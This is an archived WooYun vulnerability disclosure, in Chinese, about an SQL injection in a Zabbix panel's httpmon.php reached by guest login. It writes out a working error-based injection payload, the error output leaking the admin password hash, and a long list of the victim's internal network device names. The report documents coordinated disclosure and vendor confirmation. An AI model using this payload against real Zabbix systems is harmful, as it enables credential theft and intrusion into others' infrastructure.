乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-09: 细节已通知厂商并且等待厂商处理中 2016-03-11: 厂商已经确认,细节仅向厂商公开 2016-03-21: 细节向核心白帽子及相关领域专家公开 2016-03-31: 细节向普通白帽子公开 2016-04-10: 细节向实习白帽子公开 2016-04-25: 细节向公众公开
rt
**.**.**.**/zabbix 用guest登陆**.**.**.**/zabbix/httpmon.php?applications=2此处存在注入构造注入语句
and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆出admin的md5值
Error in query [INSERT INTO profiles (profileid, userid, idx, value_id, type) VALUES (1226, 2, 'web.httpmon.applications', 2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a), 1)] [Duplicate entry 'Admin~c430613dfdaa9b2f6dae5027313bd58f~~1' for key 1]
得到md5 c430613dfdaa9b2f6dae5027313bd58f但是解密不了。。。。但是看了一下控制了70台服务器,危害还是很大的所以提交了
上望机房_5/1_S5328_1 - - - 1上望机房_S9312_IDC_A - - - 1兆维BGP_**.**.**.** - - - 1北京万兆A - - - 1北京万兆B - - - 1墨麟-电信 - - - 1安阳机房_3/7A-S3100-1G - - - 1安阳机房_5/2A-S3100-1G - - - 1安阳机房_5/6A-S5328-10G - - - 1安阳机房_5/10A-S5024-1G - - - 1无锡国际s5328 - - - 1晨路金华-**.**.**.** - - - 1综合楼37玩 - - - 19-2-fanghuoqiang-**.**.**.** - - - 19-2-fanghuoqiang-**.**.**.** - - - 19-2-fanghuoqiang-**.**.**.** - - - 19-2-fanghuoqiang-**.**.**.** - - - 19-2-fanghuoqiang-**.**.**.** - - - 19-2-fanghuoqiang-**.**.**.** - - - 19-2-fanghuoqiang-**.**.**.** - - - 19-2-fanghuoqiang-**.**.**.** - - - 19-2-fanghuoqiang-**.**.**.** - - - 127net-254.121 - - - 037wan-**.**.**.** - - - 14399北京电信_**.**.**.** 0 % 1 % 0.03 % -BJ-BGP-**.**.**.** - - - 1BJ-BGP-**.**.**.** - - - 1cacti-238.58 - - - 1dh7609-**.**.**.** - - - 1dh9306-**.**.**.** - - - 1jh-ucloud-78.1 - - - 1jh-ucloud-92.1 - - - 1jh-ucloud-207.1 - - - 1jh-ucloud-bj-test1 - - - 1jh-ucloud-ping - - - 1jhcnc-6F-O1-s3560-ip2 - - - 1jhdx-7f-1-16-S3560G - - - 1jhdx-7f-2-1-S3750G - - - 1jhdx-7f-4-1-A - - - 1jhdx-7f-4-1-B - - - 1jhdx-7f-4-10-S3560G - - - 1jhdx-7f-9-2-S3560G - - - 1jhdx-7f-9-2-S3700-A - - - 1jhdx-7f-S9306-IDC-A - - - 1jhdx-7f-S9306-IDC-B - - - 1jhdx-7f-S9312-IDC-A - - - 1jhdx-7f-S9312-IDC-B - - - 1jhdx-8f-4-1-37WAN - - - 1jhdx-8f-5-1 - - - 1jhdx-8f-10-1-3750G - - - 1jhdx-8f-10-1-W5328 - - - 1jhdx-14-2-IP2 - - - 1jhdx-14-2-IP2-A - - - 1jhdx-14-2-IP2-B - - - 1jhdx-14-2-IP2-C - - - 1jhdx-old-7f-11-1-S5700-A - - - 1jhdx-old-7f-12-1-S5700-A - - - 1jhdx-old-7f-13-1-S5700-A - - - 1jhdx-old-7f-14-1-S5700-A - - - 1jhdx-old-7f-16-1-S5700-A - - - 1jhdx-old-7f-17-3-S3560G-4G-B - - - 1jhdx-old-7f-17-3-S3750-A - - - 1jhdx-old-7f-17-3-S5728-M1 - - - 1jhdx-old-7f-S9306-40G-trunk - - - 1jh_cmcc_H05_5700_EI - - - 1jh_cmcc_j9_5700AB - - - 1mdycloud_bgp_S5328
危害等级:高
漏洞Rank:13
确认时间:2016-03-11 19:44
CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。
暂无